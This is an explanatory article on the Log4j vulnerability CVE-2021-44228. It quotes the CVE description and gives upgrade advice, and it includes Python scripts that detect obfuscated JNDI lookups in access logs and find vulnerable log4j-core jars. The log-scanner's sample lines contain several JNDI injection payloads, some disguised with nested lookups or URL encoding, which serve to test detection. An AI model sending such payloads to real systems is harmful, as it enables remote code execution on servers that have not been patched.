What is Log4j vulnerability?
Image Credits: https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html

The Log4j vulnerability was first reported by the Alibaba Cloud Security Team in late November 2021, who alerted the Apache Software Foundation, which maintains the Log4j library.

Log4j is a very popular Java-based logging library, originally created by Ceki Gülcü and now maintained by the Apache Logging Services project; the affected code is the Log4j 2 rewrite (log4j-core). It is used by many enterprises, including Apple, Salesforce, Oracle, Red Hat, Cloudflare and Google. This vulnerability allows remote code execution (RCE): an attacker supplies input that the application passes to the server, and the server unknowingly executes the attacker's code. RCE is also referred to as remote code evaluation.

The vulnerability is classified as critical, with the maximum CVSS score of 10.0.

Impacts of a remote code execution vulnerability

  • Add, modify or delete files on the server
  • Communicate with databases and other servers on the attacker's behalf
  • Inject and execute further malicious code

[Image: remote code execution diagram. Credits: https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack]

Log4j Vulnerability Description

The following is the vulnerability description published for CVE-2021-44228 (widely known as Log4Shell):

Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Two practical consequences follow from that text. First, "parameters" means that a parameterized call such as logger.info("User-Agent: {}", userAgent) is just as exposed as string concatenation, because the lookup substitution runs on the formatted message, not only on the literal. Second, 2.15.0 only disabled the lookup by default and still sits inside the affected range quoted above, so the upgrade target should be a release that removes the functionality (2.16.0 or later), not 2.15.0.
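As an added example, not part of the original article, the following Python script shows how the lookup substitution described above is abused in practice and how to hunt for it in web server logs. Attackers rarely send the literal string ${jndi:...}; they hide it behind nested lookups such as ${lower:j} or ${env:NaN:-j}, which Log4j resolves (the :- part is its default-value syntax) before the JNDI lookup runs. The script emulates that resolution for the lower, upper and :- forms, URL-decodes first, and then looks for a JNDI lookup with its scheme and target. The access-log lines are constructed for the example using TEST-NET addresses, and the function names (normalize, find_jndi, scan) belong to this example, not to Log4j.

```python
import re
from urllib.parse import unquote

# Innermost ${...} expression: a body with no nested "${" and no "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation is unwound: ${jndi:<scheme>://<target>
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9]+)\s*:\s*//([^}\s]*)", re.IGNORECASE)


def _resolve(match):
    """Emulate the Log4j lookups attackers nest to hide the word 'jndi'."""
    body = match.group(1)
    if ":-" in body:
        # ${env:NaN:-j} or ${::-j}: a lookup that fails falls back to its default value
        return body.split(":-", 1)[1]
    key, sep, arg = body.partition(":")
    key = key.strip().lower()
    if sep and key == "lower":
        return arg.lower()
    if sep and key == "upper":
        return arg.upper()
    # jndi:, sys:, date: and unknown keys are left in place
    return match.group(0)


def normalize(text, max_rounds=10):
    """URL-decode, then collapse innermost lookups round by round until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(text):
    """Return (scheme, target) for every JNDI lookup hidden in one log line."""
    return [(scheme.lower(), target) for scheme, target in _JNDI.findall(normalize(text))]


def scan(lines):
    """Run find_jndi over a sequence of log lines; line numbers are 1-based."""
    hits = []
    for number, line in enumerate(lines, 1):
        for scheme, target in find_jndi(line):
            hits.append({"line": number, "scheme": scheme, "target": target})
    return hits


# Constructed access-log lines (TEST-NET addresses); not real traffic.
SAMPLE_LINES = [
    # benign request
    '198.51.100.4 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent header
    '198.51.100.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    # nested lower: lookups hide both the word jndi and the scheme
    '198.51.100.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/x}"',
    # failing env: lookup with a default value, URL-encoded in the request path
    '198.51.100.9 - - [10/Dec/2021:14:02:17 +0000] "GET /%24%7B%24%7Benv:NaN:-j%7Dndi:ldap://203.0.113.7:1389/b%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    # a lookup that is not JNDI: must not be flagged
    '198.51.100.4 - - [10/Dec/2021:14:02:20 +0000] "GET /?q=${sys:java.version} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(f"line {hit['line']}: jndi via {hit['scheme']} to {hit['target']}")
```

The normalization step is what separates this from a naive grep for "jndi": the third and fourth sample lines contain no such substring until the nested lookups are collapsed, and the last line shows that a non-JNDI lookup is left alone rather than reported.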

A fix for this vulnerability has already been released by Apache, and the details are published in the Apache Log4j security advisories. Before treating a system as fixed, confirm which log4j-core version is actually loaded at runtime: the library is frequently bundled inside application WARs, fat JARs and vendor products, so a patched copy in one place does not rule out an older copy elsewhere on the classpath.
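As an added example (not from the original article and not Apache's tooling), here is a Python check for the step many teams got wrong: finding every copy of log4j-core actually deployed, including jars nested inside WAR and EAR files, reading its version from the bundled pom.properties, and checking whether JndiLookup.class is still present (deleting that class from the jar was the widely used stop-gap for versions that could not be upgraded immediately). The affected ranges are taken from the CVE description quoted above. The jar and war fixtures are constructed in a temporary directory with stand-in bytes so the script runs offline; on a real host you would point scan_directory at the application's install path. All function names here are this example's own.

```python
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")
# Inclusive ranges from the CVE description quoted above.
AFFECTED = [((2, 0, 0), (2, 12, 1)), ((2, 13, 0), (2, 15, 0))]


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0): pre-release tags are dropped."""
    parts = [int(p) for p in version.split("-", 1)[0].split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def assess(version, has_jndi_lookup):
    """Classify one log4j-core copy: outside the range, affected, or class-removal mitigated."""
    v = version_tuple(version)
    if not any(lo <= v <= hi for lo, hi in AFFECTED):
        return "not in affected range"
    return "affected" if has_jndi_lookup else "mitigated (JndiLookup.class removed)"


def read_version(props_text):
    """Pull the version= line out of a Maven pom.properties file."""
    for line in props_text.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_zip(zf, path, depth=0):
    """Yield (path, version, status) for log4j-core in zf, recursing into nested archives."""
    names = set(zf.namelist())
    if POM_PROPS in names:
        version = read_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        status = assess(version, JNDI_CLASS in names) if version else "version unknown"
        yield path, version or "?", status
    if depth >= 3:  # bound recursion on archives nested inside archives
        return
    for name in sorted(names):
        if name.lower().endswith(NESTED):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                yield from inspect_zip(inner, f"{path}!/{name}", depth + 1)


def scan_directory(root):
    """Walk root and inspect every jar/war/ear, including those bundled inside others."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(NESTED):
                p = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(p) as zf:
                        findings.extend(inspect_zip(zf, p))
                except zipfile.BadZipFile:
                    continue
    return findings


def _build_zip(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed fixtures, not real Log4j artifacts: class bodies are stand-in bytes."""
    stub = b"\xca\xfe\xba\xbe"

    def core(version, with_jndi=True):
        entries = {POM_PROPS: f"version={version}\nartifactId=log4j-core\n",
                   "org/apache/logging/log4j/core/Logger.class": stub}
        if with_jndi:
            entries[JNDI_CLASS] = stub
        return _build_zip(entries)

    os.makedirs(os.path.join(root, "lib"))
    fixtures = {
        "lib/log4j-core-2.14.1.jar": core("2.14.1"),                  # affected
        "lib/log4j-core-2.14.1-stripped.jar": core("2.14.1", False),  # class removed
        "app.war": _build_zip({"WEB-INF/web.xml": "<web-app/>",
                               "WEB-INF/lib/log4j-core-2.16.0.jar": core("2.16.0")}),
    }
    for rel, data in fixtures.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as f:
            f.write(data)


def demo():
    """Scan the constructed tree; keys are paths relative to the tree root."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): (v, s)
                for p, v, s in scan_directory(root)}


if __name__ == "__main__":
    for path, (version, status) in demo().items():
        print(f"{path}: log4j-core {version} -> {status}")
```

The nested-archive handling is the part worth keeping: a top-level directory listing shows only app.war, while the copy of log4j-core that matters lives inside it. The version check follows the page's quoted ranges exactly; a copy reported as "mitigated" is one that was left at an old version with the lookup class deleted, which is a temporary measure, not a substitute for upgrading.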

What is Log4j?

Log4j is divided into three main components: Loggers, Appenders and Layouts.

Loggers: capture the log events raised by application code (by logger name and severity level) and pass them on to the Appenders attached to them.

Appenders: deliver the log events to a destination, such as a file, a database or the console.

Layouts: format each log message before an Appender writes it. Some default layouts provided by Log4j are PatternLayout, SimpleLayout, XMLLayout and HTMLLayout. The message lookup substitution abused by this vulnerability runs while the message is being formatted, which is why any attacker-controlled string that reaches a logger call is dangerous regardless of where the output ends up.

Log4j Demonstration:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jExample {

    // One logger per class, named after the class so the origin shows up in the output
    private static final Logger logger = LogManager.getLogger(Log4jExample.class);

    public static void main(String[] args) {
        logger.debug("Debug log message");
        logger.info("Info log message");
        logger.error("Error log message");
    }
}

After compiling and running the code above against a configuration whose root logger level is DEBUG, we get the output below. (With no configuration file present, Log4j 2 falls back to a default that sends only ERROR and above to the console, prefixed with a timestamp, thread name and level, so only the last message would appear.)

Debug log message
Info log message
Error log message        

Thanks! :)

More articles by Chandan Singh